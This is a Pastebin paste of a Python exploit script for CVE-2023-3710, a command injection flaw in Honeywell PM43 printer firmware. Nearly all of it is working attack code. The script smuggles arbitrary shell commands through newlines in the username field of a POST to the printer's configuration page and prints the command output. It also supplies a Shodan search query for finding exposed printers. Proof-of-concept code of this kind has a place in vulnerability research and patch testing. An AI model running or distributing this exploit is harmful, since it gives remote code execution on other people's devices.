Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
- #- Shodan Dork: http.title:PM43 , PM43
- #- Exploit Author: ByteHunter
- #- Email: 0xByteHunter@proton.me
- #- Frimware Version: versions prior to P10.19.050004
- #- Tested on: P10.17.019667
- #- CVE : CVE-2023-3710
- import requests
- import argparse
- BLUE = '\033[94m'
- YELLOW = '\033[93m'
- RESET = '\033[0m'
- def banner():
- banner = """
- ╔════════════════════════════════════════════════╗
- CVE-2023-3710
- Command Injection in Honeywell PM43 Printers
- Author: ByteHunter
- ╚════════════════════════════════════════════════╝
- """
- print(YELLOW + banner + RESET)
- def run_command(url, command):
- full_url = f"{url}/loadfile.lp?pageid=Configure"
- payload = {
- 'username': f'hunt\n{command}\n',
- 'userpassword': 'admin12345admin!!'
- }
- try:
- response = requests.post(full_url, data=payload, verify=False)
- response_text = response.text
- html_start_index = response_text.find('<html>')
- if html_start_index != -1:
- return response_text[:html_start_index]
- else:
- return response_text
- except requests.exceptions.RequestException as e:
- return f"Error: {e}"
- def main():
- parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
- parser.add_argument('--url', dest='url', help='Target URL', required=True)
- parser.add_argument('--run', dest='command', help='Command to execute', required=True)
- args = parser.parse_args()
- response = run_command(args.url, args.command)
- print(f"{BLUE}{response}{RESET}")
- if __name__ == "__main__":
- banner()
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
